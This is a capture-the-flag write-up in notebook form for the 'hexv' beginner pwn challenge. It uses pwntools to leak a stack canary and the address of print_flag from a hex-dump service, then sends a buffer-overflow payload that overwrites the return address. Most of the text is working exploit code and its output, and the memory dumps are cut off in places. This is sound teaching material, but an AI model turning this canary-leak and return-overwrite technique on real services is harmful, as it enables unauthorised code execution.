hexv
====

## Challenge
This is a good pwn challenge to start with. Use the help button to ask for a hint if you get stuck.

Sourceless, binaryless, full-protection beginner pwn! (not clickbait)

``` ncat --ssl hexv.challs.pwnoh.io 1337 ```

## Analysis
First step's first, let's connect to the endpoint

In [1]:
from pwn import *
context.encoding = "utf-8"
conn = remote("hexv.challs.pwnoh.io", 1337, ssl=True)
print(conn.recvline().decode())

[x] Opening connection to hexv.challs.pwnoh.io on port 1337
[x] Opening connection to hexv.challs.pwnoh.io on port 1337: Trying 2600:1f16:75:1c01::4
[+] Opening connection to hexv.challs.pwnoh.io on port 1337: Done
hexv 0.1.0 (beta)



Let's try sending it some stuff

In [2]:
conn.writeline(b"deadbeef")
print(conn.recvline().decode())

>> [31mERROR: [0munrecognized command. Use `help` to list available commands.



A help command is useful! Let's see

In [3]:
conn.writeline(b"help")
[print(x) for x in conn.recvlinesS(8)];

>> hexv - a modern hex dump tool
─────────────────────────────
[1mhelp:       [0mdisplay this menu
[1mhex <str>:  [0mconvert a string to hexadecimal and print
[1mstr <hex>:  [0mconvert hexadecimal to a string and print
[1mdump:       [0mdump current memory
[1mfuncs:      [0mdisplay functions and their addresses
[1mquit:       [0mquit tool


Let's investigate some of these commands

In [4]:
conn.writeline(b"hex helloworld")
conn.writeline(b"str 68656C6C6F776F726C64")
conn.writeline(b"dump")
conn.writeline(b"funcs")
conn.writeline(b"quit")
print(conn.recvallS())

[x] Receiving all data
[x] Receiving all data: 3B
[x] Receiving all data: 27B
[x] Receiving all data: 62B
[x] Receiving all data: 320B
[x] Receiving all data: 1.73KB
[x] Receiving all data: 2.76KB
[x] Receiving all data: 3.32KB
[+] Receiving all data: Done (3.32KB)
[*] Closed connection to hexv.challs.pwnoh.io port 1337
>> 68656C6C6F776F726C64
>> helloworld
>> ┌────────────────────────────────────────────────────────────────────┐
│ Memory Layout                                                      │
├────────────────────────────────────────────────────────────────────┤
│ [1m0x7ffc46fd56b0[0m  [33m64[0m [33m75[0m [33m6d[0m [33m70[0m  [33m00[0m [33m77[0m [33m6f[0m [33m72[0m  [33m6c[0m [33m64[0m [33m00[0m [33m43[0m  [33m36[0m [33m46[0m [33m37[0m [33m37[0m │
│ [1m0x7ffc46fd56c0[0m  [33m36[0m [33m46[0m [33m37[0m [33m32[0m  [33m36[0m [33m43[0m [33m36[0m [33m34[0m  [33m00[0m [33m00[0m [33m00[0m [33m00[0m  [33m00[0m [33m00[0m [33

Let's try overflowing the memory buffer - this could be an RCE. The chocies of colour in the memory dump are curious, I suspect these represent the values to target (perhaps a stack canary and return pointer)

In [11]:
conn = remote("hexv.challs.pwnoh.io", 1337, ssl=True)
conn.writeline(b"str " + b"4142434445464748" * 8)
conn.writeline(b"dump")
conn.writeline(b"quit")
print(conn.recvallS())


[x] Opening connection to hexv.challs.pwnoh.io on port 1337
[x] Opening connection to hexv.challs.pwnoh.io on port 1337: Trying 2600:1f16:75:1c01::4
[+] Opening connection to hexv.challs.pwnoh.io on port 1337: Done
[x] Receiving all data
[x] Receiving all data: 0B
[x] Receiving all data: 21B
[x] Receiving all data: 89B
[x] Receiving all data: 200B
[x] Receiving all data: 345B
[x] Receiving all data: 1.09KB
[x] Receiving all data: 2.37KB
[x] Receiving all data: 3.02KB
[+] Receiving all data: Done (3.02KB)
[*] Closed connection to hexv.challs.pwnoh.io port 1337
hexv 0.1.0 (beta)
>> ABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGHABCDEFGH
>> ┌────────────────────────────────────────────────────────────────────┐
│ Memory Layout                                                      │
├────────────────────────────────────────────────────────────────────┤
│ [1m0x7ffd30739770[0m  [33m64[0m [33m75[0m [33m6d[0m [33m70[0m  [33m00[0m [33m46[0m [33m47[0m [33m48[0m  [33m41

When we carefully overflow only into the red portion, we receive a stack smashing error - this is certainly a stack canary. Let's now construct a payload, assuming the blue value is the return pointer

In [6]:
import re

# ANSI escape sequence stripper, courtesy of ChatGPT
_ANSI_RE = re.compile(r'(?:\x1B\[[0-?]*[ -/]*[@-~]|\x1B\][^\x07]*(?:\x07|\x1B\\)|\x1B[P^_].*?\x1B\\|\x1B.)', re.DOTALL)

conn = remote("hexv.challs.pwnoh.io", 1337, ssl=True)
conn.readuntil(">>")

# parse function pointers:
conn.writeline(b"funcs")
conn.readlinesS(2) # skip header
funcs = conn.readuntilS(">>")
funcMap = dict([line.split("  ")[::-1] for line in _ANSI_RE.sub('', funcs).splitlines()[:-1]])

printFlag = enhex(int(funcMap["print_flag"], 16).to_bytes(length=8, byteorder="little")).encode()
print("print_flag is at", printFlag)

# get the stack canary
conn.sendline("dump")
conn.readlines(3) # skip header
memoryLines = conn.recvuntilS(">>")
print(memoryLines)
memoryLines = _ANSI_RE.sub('', memoryLines).splitlines()[:-2]

memory = []
for line in memoryLines:
    split = line[2:-2].split("  ", 1)
    startAddress = split[0]
    vals = [int(x, 16) for x in split[1].split()]
    memory.append((startAddress, vals))

canary = enhex(u64(bytes(memory[-3][1][8:])).to_bytes(length=8, byteorder="little")).encode()
print("Stack canary is", canary)

# Construct payload with 15 words of padding, the canary, another word of padding, then the address of the printFlag function
payload = b"4142434445464748" * 15 + canary + b"4142434445464748" + printFlag

print(payload)
conn.writeline(b"str " + payload)
conn.writeline(b"dump")
conn.writeline(b"quit")
print(conn.readallS())

[x] Opening connection to hexv.challs.pwnoh.io on port 1337
[x] Opening connection to hexv.challs.pwnoh.io on port 1337: Trying 2600:1f16:75:1c01::4
[+] Opening connection to hexv.challs.pwnoh.io on port 1337: Done
print_flag is at b'e992edf045560000'
│ [1m0x7ffced99a380[0m  [33m64[0m [33m75[0m [33m6d[0m [33m70[0m  [33m00[0m [33m00[0m [33m00[0m [33m00[0m  [33m00[0m [33m00[0m [33m00[0m [33m00[0m  [33m00[0m [33m00[0m [33m00[0m [33m00[0m │
│ [1m0x7ffced99a390[0m  [33m00[0m [33m00[0m [33m00[0m [33m00[0m  [33m00[0m [33m00[0m [33m00[0m [33m00[0m  [33m05[0m [33m00[0m [33m00[0m [33m00[0m  [33m00[0m [33m00[0m [33m00[0m [33m00[0m │
│ [1m0x7ffced99a3a0[0m  [33m40[0m [33m80[0m [33med[0m [33mf0[0m  [33m45[0m [33m56[0m [33m00[0m [33m00[0m  [33m0d[0m [33m00[0m [33m00[0m [33m00[0m  [33m00[0m [33m00[0m [33m00[0m [33m00[0m │
│ [1m0x7ffced99a3b0[0m  [33m20[0m [33ma4[0m [33m99[0m [33med[0m  [33